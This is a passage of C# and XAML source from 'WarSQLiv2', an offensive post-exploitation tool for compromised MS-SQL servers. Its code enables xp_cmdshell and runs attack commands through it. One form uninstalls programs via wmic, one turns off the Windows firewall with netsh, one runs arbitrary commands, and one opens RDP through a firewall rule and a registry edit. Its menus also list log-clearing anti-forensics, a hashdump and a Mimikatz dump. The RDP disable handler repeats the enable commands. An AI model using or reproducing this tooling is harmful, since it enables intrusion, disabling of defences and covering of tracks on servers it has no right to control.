17 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
18 | private int _selectedId = 0;
19 | public FrmAllPrograms()
20 | {
21 | InitializeComponent();
22 | }
23 | private void Window_Loaded(object sender, RoutedEventArgs e)
24 | {
25 | _languageControl.FindLang();
26 | var lootedFileControl = new LootedFileControl();
27 | try
28 | {
29 | Dispatcher.Invoke((Action)delegate
30 | {
31 | btnGet.Content = _languageControl.SelectedLanguage.GetString("ButtonShow");
32 | Title = _languageControl.SelectedLanguage.GetString("TitleAllPrograms");
33 | lootedFileControl.FileControl();
34 | var lootedList = lootedFileControl.LootedList;
35 | foreach (var t in lootedList)
36 | {
37 | lstLooted.Items.Add(t);
38 | }
39 |
40 | lstLooted.SelectedIndex = 0;
41 | var toolStripControl = new ToolStripInformation
42 | {
43 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
44 | Command = "sp_server_info",
45 | };
46 | toolStripControl.SqlServerInformation();
47 | lblStrip.Content = string.Empty;
48 | lblStrip.Content = toolStripControl.SqlServerInfo;
49 | });
50 |
51 | }
52 | catch (Exception exp)
53 | {
54 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
55 | {
56 | txtStatus.AppendText(lootedFileControl.Exception);
57 | });
58 | }
59 | }
60 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
61 | {
62 | try
63 | {
64 | Dispatcher.Invoke((Action)delegate
65 | {
66 | _selectedId = 0;
67 | _selectedId = lstLooted.SelectedIndex;
68 | lblStrip.Content = string.Empty;
69 | var toolStripControl = new ToolStripInformation
70 | {
71 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
72 | Command = "sp_server_info",
73 | };
74 | toolStripControl.SqlServerInformation();
75 | lblStrip.Content = toolStripControl.SqlServerInfo;
76 | });
77 |
78 | }
79 | catch (Exception exp)
80 | {
81 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
82 | {
83 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
84 | });
85 |
86 | }
87 | }
88 | private void btnGet_Click(object sender, RoutedEventArgs e)
89 | {
90 | var isActivated = cmdControl.isActivated;
91 | var isExecuted = cmdControl.isExecuted;
92 | lstAppList.Items.Clear();
93 | if (isActivated == false && isExecuted == false)
94 | {
95 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
96 | try
97 | {
98 | Dispatcher.Invoke((Action)delegate
99 | {
100 | enableXpCmdShell.XpCmdShellStatus();
101 | txtStatus.AppendText(enableXpCmdShell.Result);
102 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
103 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
104 | if (contains == true)
105 | {
106 | isActivated = true;
107 | isExecuted = true;
108 | }
109 | });
110 | }
111 | catch (Exception)
112 | {
113 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
114 | {
115 | txtStatus.AppendText(enableXpCmdShell.CmdException);
116 | });
117 | }
118 | }
119 | if (isExecuted == true && isActivated == true)
120 | {
121 | try
122 | {
123 | Dispatcher.BeginInvoke((Action)delegate
124 | {
125 | lstAppList.Items.Clear();
126 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
127 | _postExploitation.ExploitCode = "USE [master]\r\n";
128 | _postExploitation.ExploitCode += "EXEC xp_cmdshell '\"wmic product get name\"';\r\n";
129 | _postExploitation.ShowProgramList();
130 | for (int i = 0; i < _postExploitation._programList.Count; i++)
131 | {
132 | lstAppList.Items.Add(_postExploitation._programList[i].Replace(" ", "").Replace(" ", "").Replace("\r","").Replace("\n",""));
133 | }
134 | txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageExploitTask2"));
135 | });
136 | }
137 | catch (Exception exp)
138 | {
139 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
140 | {
141 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
142 | });
143 | }
144 | }
145 | }
146 | private void MenuItemRemove_Click(object sender, RoutedEventArgs e)
147 | {
148 | if (lstAppList.SelectedIndex > -1)
149 | {
150 | MessageBoxResult result = MessageBox.Show(_languageControl.SelectedLanguage.GetString("MessageService3"), @"WarSQLiv2", MessageBoxButton.YesNo);
151 | if (result == MessageBoxResult.Yes)
152 | {
153 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitTask5")}");
154 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
155 | {
156 | var srvCommand = "USE [master]\r\n";
157 | srvCommand += "EXEC xp_cmdshell '\"wmic product where name=\"" + lstAppList.SelectedItem.ToString().Trim().Replace("\r", "") + "\" call uninstall /nointeractive\"';\r\n";
158 | _postExploitation.ExploitCode = srvCommand;
159 | _postExploitation.ShowProgramList();
160 | var success = _postExploitation._programList.Count;
161 | if (success > 0)
162 | {
163 | foreach (var t in _postExploitation._programList)
164 | {
165 | txtStatus.AppendText(Environment.NewLine + t.Replace(" ", "").Replace(" ", ""));
166 | }
167 | }
168 |
169 | });
170 | }
171 | }
172 | }
173 | }
174 | }
175 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmAntiForensics.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 | Clear Windows Event Logs
14 | Clear MS-SQL Logs
15 | Stop Windows Event Service
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmBase64Converter.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmBase64Converter.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Windows;
3 | using WarSQLiv2.Exploitation.Control;
4 | using WarSQLiv2.Exploitation.PostExploitation;
5 |
6 | namespace WarSQLiv2.UserControls.Attack.MSSQL
7 | {
8 | ///
9 | /// Interaction logic for FrmBase64Converter.xaml
10 | ///
11 | public partial class FrmBase64Converter : Window
12 | {
13 | private readonly LanguageControl _languageControl = new LanguageControl();
14 | public FrmBase64Converter()
15 | {
16 | InitializeComponent();
17 | }
18 | private void BtnConvert_OnClick(object sender, RoutedEventArgs e)
19 | {
20 | txtBase64.Text = EncodeBase64.ConvertTextToBase64(txtClearText.Text);
21 | }
22 | private void Window_Loaded(object sender, RoutedEventArgs e)
23 | {
24 | _languageControl.FindLang();
25 | btnConvert.Content = _languageControl.SelectedLanguage.GetString("ButtonConvertBase64");
26 | lblInput.Content = _languageControl.SelectedLanguage.GetString("LabelBase64Input");
27 | lblOutput.Content = _languageControl.SelectedLanguage.GetString("LabelBase64Output");
28 | Title = _languageControl.SelectedLanguage.GetString("TitleBase64Encoder");
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmDirectoryManager.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmDisableWindowsFirewall.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmDisableWindowsFirewall.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Windows;
3 | using System.Windows.Controls;
4 | using System.Windows.Threading;
5 | using WarSQLiv2.Exploitation.Control;
6 | using WarSQLiv2.Exploitation.PostExploitation;
7 |
8 | namespace WarSQLiv2.UserControls.Attack.MSSQL
9 | {
10 | ///
11 | /// Interaction logic for FrmDisableWindowsFirewall.xaml
12 | ///
13 | public partial class FrmDisableWindowsFirewall : Window
14 | {
15 | private readonly LanguageControl _languageControl = new LanguageControl();
16 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
17 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
18 | private int _selectedId = 0;
19 | public FrmDisableWindowsFirewall()
20 | {
21 | InitializeComponent();
22 | }
23 | private void Window_Loaded(object sender, RoutedEventArgs e)
24 | {
25 | _languageControl.FindLang();
26 | var lootedFileControl = new LootedFileControl();
27 | try
28 | {
29 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
30 | {
31 | btnDisable.Content = _languageControl.SelectedLanguage.GetString("ButtonDisable");
32 | btnEnable.Content = _languageControl.SelectedLanguage.GetString("ButtonEnable");
33 | Title = _languageControl.SelectedLanguage.GetString("TitleWindowsFirewall");
34 | lootedFileControl.FileControl();
35 | var lootedList = lootedFileControl.LootedList;
36 | foreach (var t in lootedList)
37 | {
38 | lstLooted.Items.Add(t);
39 | }
40 |
41 | lstLooted.SelectedIndex = 0;
42 | var toolStripControl = new ToolStripInformation
43 | {
44 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
45 | Command = "sp_server_info",
46 | };
47 | toolStripControl.SqlServerInformation();
48 | lblStrip.Content = string.Empty;
49 | lblStrip.Content = toolStripControl.SqlServerInfo;
50 | });
51 |
52 | }
53 | catch (Exception exp)
54 | {
55 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
56 | {
57 | txtStatus.AppendText(lootedFileControl.Exception);
58 | });
59 | }
60 | }
61 | private void btnEnable_Click(object sender, RoutedEventArgs e)
62 | {
63 | var isActivated = cmdControl.isActivated;
64 | var isExecuted = cmdControl.isExecuted;
65 | if (isActivated == false && isExecuted == false)
66 | {
67 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
68 | try
69 | {
70 | Dispatcher.Invoke((Action)delegate
71 | {
72 | enableXpCmdShell.XpCmdShellStatus();
73 | txtStatus.AppendText(enableXpCmdShell.Result);
74 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
75 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
76 | if (contains == true)
77 | {
78 | isActivated = true;
79 | isExecuted = true;
80 | }
81 | });
82 | }
83 | catch (Exception)
84 | {
85 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
86 | {
87 | txtStatus.AppendText(enableXpCmdShell.CmdException);
88 | });
89 | }
90 | }
91 | if (isExecuted == true && isActivated == true)
92 | {
93 | if (lstLooted.SelectedIndex != -1)
94 | {
95 | try
96 | {
97 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
98 | {
99 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
100 | _postExploitation.SqlCommand = "netsh Advfirewall set allprofiles state on";
101 | _postExploitation.SqlExploitation();
102 | txtStatus.AppendText(Environment.NewLine + _postExploitation.ExploitResult.Replace("\r", "").Replace("\n", ""));
103 | });
104 | }
105 | catch (Exception exp)
106 | {
107 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
108 | {
109 | txtStatus.AppendText(string.Format(_languageControl.SelectedLanguage.GetString("Exception1"), Environment.NewLine, exp.Message));
110 | });
111 | }
112 | }
113 | else
114 | {
115 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
116 | {
117 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
118 | });
119 | }
120 | }
121 | }
122 | private void btnDisable_Click(object sender, RoutedEventArgs e)
123 | {
124 | var isActivated = cmdControl.isActivated;
125 | var isExecuted = cmdControl.isExecuted;
126 | if (isActivated == false && isExecuted == false)
127 | {
128 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
129 | try
130 | {
131 | Dispatcher.Invoke((Action)delegate
132 | {
133 | enableXpCmdShell.XpCmdShellStatus();
134 | txtStatus.AppendText(enableXpCmdShell.Result);
135 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
136 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
137 | if (contains == true)
138 | {
139 | isActivated = true;
140 | isExecuted = true;
141 | }
142 | });
143 | }
144 | catch (Exception)
145 | {
146 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
147 | {
148 | txtStatus.AppendText(enableXpCmdShell.CmdException);
149 | });
150 | }
151 | }
152 | if (isExecuted == true && isActivated == true)
153 | {
154 | if (lstLooted.SelectedIndex != -1)
155 | {
156 | try
157 | {
158 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
159 | {
160 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
161 | _postExploitation.SqlCommand = "netsh Advfirewall set allprofiles state off";
162 | _postExploitation.SqlExploitation();
163 | txtStatus.AppendText(Environment.NewLine + _postExploitation.ExploitResult.Replace("\r", "").Replace("\n", ""));
164 | });
165 | }
166 | catch (Exception exp)
167 | {
168 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
169 | {
170 | txtStatus.AppendText(string.Format(_languageControl.SelectedLanguage.GetString("Exception1"), Environment.NewLine, exp.Message));
171 | });
172 | }
173 | }
174 | else
175 | {
176 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
177 | {
178 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
179 | });
180 | }
181 | }
182 | }
183 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
184 | {
185 | try
186 | {
187 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
188 | {
189 | _selectedId = 0;
190 | _selectedId = lstLooted.SelectedIndex;
191 | lblStrip.Content = string.Empty;
192 | var toolStripControl = new ToolStripInformation
193 | {
194 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
195 | Command = "sp_server_info",
196 | };
197 | toolStripControl.SqlServerInformation();
198 | lblStrip.Content = toolStripControl.SqlServerInfo;
199 | });
200 |
201 | }
202 | catch (Exception exp)
203 | {
204 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
205 | {
206 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
207 | });
208 | }
209 | }
210 | }
211 | }
212 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmEnumMsSql.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 | Show All MS-SQL Users
16 | Show All Databases
17 | Password Never Expire Check
18 | Available Stored Procedure
19 | MS-SQL User Hashdump
20 | Get Product Name
21 | OS Installation Date
22 | Get System Root Folder
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmMimikatzDump.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmPowerShell.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmPowerShell.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Windows;
4 | using System.Windows.Controls;
5 | using System.Windows.Threading;
6 | using WarSQLiv2.Exploitation.Control;
7 | using WarSQLiv2.Exploitation.PostExploitation;
8 | using System.Text;
9 |
10 | namespace WarSQLiv2.UserControls.Attack.MSSQL
11 | {
12 | ///
13 | /// Interaction logic for FrmPowerShell.xaml
14 | ///
15 | public partial class FrmPowerShell : Window
16 | {
17 | private readonly LanguageControl _languageControl = new LanguageControl();
18 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
19 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
20 | private int _selectedId = 0;
21 | public FrmPowerShell()
22 | {
23 | InitializeComponent();
24 | }
25 | private void BtnBase64_OnClick(object sender, RoutedEventArgs e)
26 | {
27 | var base64Conv = new FrmBase64Converter();
28 | base64Conv.ShowDialog();
29 | }
30 | private void Window_Loaded(object sender, RoutedEventArgs e)
31 | {
32 | _languageControl.FindLang();
33 | var lootedFileControl = new LootedFileControl();
34 | try
35 | {
36 | Dispatcher.Invoke((Action)delegate
37 | {
38 | btnRunPS.Content = _languageControl.SelectedLanguage.GetString("ButtonRunPsCommand");
39 | btnBase64.Content = _languageControl.SelectedLanguage.GetString("ButtonBase64Tool");
40 | Title = _languageControl.SelectedLanguage.GetString("TitlePowershell");
41 | lootedFileControl.FileControl();
42 | var lootedList = lootedFileControl.LootedList;
43 | foreach (var t in lootedList)
44 | {
45 | lstLooted.Items.Add(t);
46 | }
47 |
48 | lstLooted.SelectedIndex = 0;
49 | var toolStripControl = new ToolStripInformation
50 | {
51 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
52 | Command = "sp_server_info",
53 | };
54 | toolStripControl.SqlServerInformation();
55 | lblStrip.Content = string.Empty;
56 | lblStrip.Content = toolStripControl.SqlServerInfo;
57 | });
58 |
59 | }
60 | catch (Exception exp)
61 | {
62 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
63 | {
64 | txtStatus.AppendText(lootedFileControl.Exception);
65 | });
66 | }
67 | }
68 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
69 | {
70 | try
71 | {
72 | Dispatcher.Invoke((Action)delegate
73 | {
74 | _selectedId = 0;
75 | _selectedId = lstLooted.SelectedIndex;
76 | lblStrip.Content = string.Empty;
77 | var toolStripControl = new ToolStripInformation
78 | {
79 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
80 | Command = "sp_server_info",
81 | };
82 | toolStripControl.SqlServerInformation();
83 | lblStrip.Content = toolStripControl.SqlServerInfo;
84 | });
85 |
86 | }
87 | catch (Exception exp)
88 | {
89 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
90 | {
91 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
92 | });
93 |
94 | }
95 | }
96 | private void btnRunPs_Click(object sender, RoutedEventArgs e)
97 | {
98 | var isActivated = cmdControl.isActivated;
99 | var isExecuted = cmdControl.isExecuted;
100 | if (isActivated == false && isExecuted == false)
101 | {
102 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
103 | try
104 | {
105 | Dispatcher.Invoke((Action)delegate
106 | {
107 | enableXpCmdShell.XpCmdShellStatus();
108 | txtStatus.AppendText(enableXpCmdShell.Result);
109 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
110 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
111 | if (contains == true)
112 | {
113 | isActivated = true;
114 | isExecuted = true;
115 | }
116 | });
117 | }
118 | catch (Exception)
119 | {
120 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
121 | {
122 | txtStatus.AppendText(enableXpCmdShell.CmdException);
123 | });
124 | }
125 | }
126 | if (isExecuted == true && isActivated == true)
127 | {
128 | try
129 | {
130 | Dispatcher.BeginInvoke((Action)delegate
131 | {
132 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
133 | _postExploitation.ExploitCode = "USE [master]\r\n";
134 | _postExploitation.ExploitCode += "EXEC xp_cmdshell '\"cmd /c "+ txtPsCommand.Text + "';\r\n";
135 | _postExploitation.ShowProgramList();
136 | for (var i = 0; i < _postExploitation._programList.Count; i++)
137 | {
138 | txtStatus.AppendText(_postExploitation._programList[i]);
139 | }
140 | txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageExploitTask2"));
141 | });
142 | }
143 | catch (Exception exp)
144 | {
145 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
146 | {
147 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
148 | });
149 | }
150 | }
151 | }
152 | }
153 | }
154 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmPrivilegeEscalation.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmRdpManager.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/WarSQLiv2/UserControls/Attack/MSSQL/FrmRdpManager.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Windows;
3 | using System.Windows.Controls;
4 | using System.Windows.Threading;
5 | using WarSQLiv2.Exploitation.Control;
6 | using WarSQLiv2.Exploitation.PostExploitation;
7 |
8 | namespace WarSQLiv2.UserControls.Attack.MSSQL
9 | {
10 | ///
11 | /// Interaction logic for FrmRdpManager.xaml
12 | ///
13 | public partial class FrmRdpManager : Window
14 | {
15 | private readonly LanguageControl _languageControl = new LanguageControl();
16 | public xpCmdShellControl cmdControl = new xpCmdShellControl();
17 | readonly MsSqlPostExploitation _postExploitation = new MsSqlPostExploitation();
18 | private int _selectedId = 0;
19 | public FrmRdpManager()
20 | {
21 | InitializeComponent();
22 | }
23 | private void Window_Loaded(object sender, RoutedEventArgs e)
24 | {
25 | _languageControl.FindLang();
26 | var lootedFileControl = new LootedFileControl();
27 | try
28 | {
29 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
30 | {
31 | btnDisable.Content = _languageControl.SelectedLanguage.GetString("ButtonDisable");
32 | btnEnable.Content = _languageControl.SelectedLanguage.GetString("ButtonEnable");
33 | Title = _languageControl.SelectedLanguage.GetString("TitleRDP");
34 | lootedFileControl.FileControl();
35 | var lootedList = lootedFileControl.LootedList;
36 | foreach (var t in lootedList)
37 | {
38 | lstLooted.Items.Add(t);
39 | }
40 |
41 | lstLooted.SelectedIndex = 0;
42 | var toolStripControl = new ToolStripInformation
43 | {
44 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
45 | Command = "sp_server_info",
46 | };
47 | toolStripControl.SqlServerInformation();
48 | lblStrip.Content = string.Empty;
49 | lblStrip.Content = toolStripControl.SqlServerInfo;
50 | });
51 |
52 | }
53 | catch (Exception exp)
54 | {
55 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
56 | {
57 | txtStatus.AppendText(lootedFileControl.Exception);
58 | });
59 | }
60 | }
61 | private void lstLooted_SelectionChanged(object sender, SelectionChangedEventArgs e)
62 | {
63 | try
64 | {
65 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
66 | {
67 | _selectedId = 0;
68 | _selectedId = lstLooted.SelectedIndex;
69 | lblStrip.Content = string.Empty;
70 | var toolStripControl = new ToolStripInformation
71 | {
72 | SelectedLootedServer = lstLooted.SelectedItem.ToString(),
73 | Command = "sp_server_info",
74 | };
75 | toolStripControl.SqlServerInformation();
76 | lblStrip.Content = toolStripControl.SqlServerInfo;
77 | });
78 |
79 | }
80 | catch (Exception exp)
81 | {
82 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
83 | {
84 | txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
85 | });
86 | }
87 | }
88 | private void btnEnable_Click(object sender, RoutedEventArgs e)
89 | {
90 | var isActivated = cmdControl.isActivated;
91 | var isExecuted = cmdControl.isExecuted;
92 | if (isActivated == false && isExecuted == false)
93 | {
94 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
95 | try
96 | {
97 | Dispatcher.Invoke((Action)delegate
98 | {
99 | enableXpCmdShell.XpCmdShellStatus();
100 | txtStatus.AppendText(enableXpCmdShell.Result);
101 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
102 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
103 | if (contains == true)
104 | {
105 | isActivated = true;
106 | isExecuted = true;
107 | }
108 | });
109 | }
110 | catch (Exception)
111 | {
112 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
113 | {
114 | txtStatus.AppendText(enableXpCmdShell.CmdException);
115 | });
116 | }
117 | }
118 | if (isExecuted == true && isActivated == true)
119 | {
120 | if (lstLooted.SelectedIndex != -1)
121 | {
122 | try
123 | {
124 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
125 | {
126 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
127 | var rdpCommand = string.Empty;
128 | rdpCommand += "USE [master]\r\n";
129 | rdpCommand += "EXEC xp_cmdshell 'netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes';\r\n";
130 | rdpCommand += "EXEC xp_cmdshell 'reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f';";
131 | _postExploitation.ExploitCode = rdpCommand;
132 | _postExploitation.RunExploit();
133 | txtStatus.AppendText(Environment.NewLine + _postExploitation.ExploitResult.Replace("\r", "").Replace("\n", ""));
134 | });
135 | }
136 | catch (Exception exp)
137 | {
138 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
139 | {
140 | txtStatus.AppendText(string.Format(_languageControl.SelectedLanguage.GetString("Exception1"), Environment.NewLine, exp.Message));
141 | });
142 | }
143 | }
144 | else
145 | {
146 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
147 | {
148 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
149 | });
150 | }
151 | }
152 | }
153 | private void btnDisable_Click(object sender, RoutedEventArgs e)
154 | {
155 | var isActivated = cmdControl.isActivated;
156 | var isExecuted = cmdControl.isExecuted;
157 | if (isActivated == false && isExecuted == false)
158 | {
159 | var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
160 | try
161 | {
162 | Dispatcher.Invoke((Action)delegate
163 | {
164 | enableXpCmdShell.XpCmdShellStatus();
165 | txtStatus.AppendText(enableXpCmdShell.Result);
166 | var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
167 | var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
168 | if (contains == true)
169 | {
170 | isActivated = true;
171 | isExecuted = true;
172 | }
173 | });
174 | }
175 | catch (Exception)
176 | {
177 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
178 | {
179 | txtStatus.AppendText(enableXpCmdShell.CmdException);
180 | });
181 | }
182 | }
183 | if (isExecuted == true && isActivated == true)
184 | {
185 | if (lstLooted.SelectedIndex != -1)
186 | {
187 | try
188 | {
189 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
190 | {
191 | _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
192 | var rdpCommand = string.Empty;
193 | rdpCommand += "USE [master]\r\n";
194 | rdpCommand += "EXEC xp_cmdshell 'netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes';\r\n";
195 | rdpCommand += "EXEC xp_cmdshell 'reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f';";
196 | _postExploitation.ExploitCode = rdpCommand;
197 | _postExploitation.RunExploit();
198 | txtStatus.AppendText(Environment.NewLine + _postExploitation.ExploitResult.Replace("\r", "").Replace("\n", ""));
199 | });
200 | }
201 | catch (Exception exp)
202 | {
203 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
204 | {
205 | txtStatus.AppendText(string.Format(_languageControl.SelectedLanguage.GetString("Exception1"), Environment.NewLine, exp.Message));
206 | });
207 | }
208 | }
209 | else
210 | {
211 | Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action)delegate
212 | {
213 | txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
214 | });
215 | }
216 | }
217 | }
218 | }
219 | }
220 |
--------------------------------------------------------------------------------
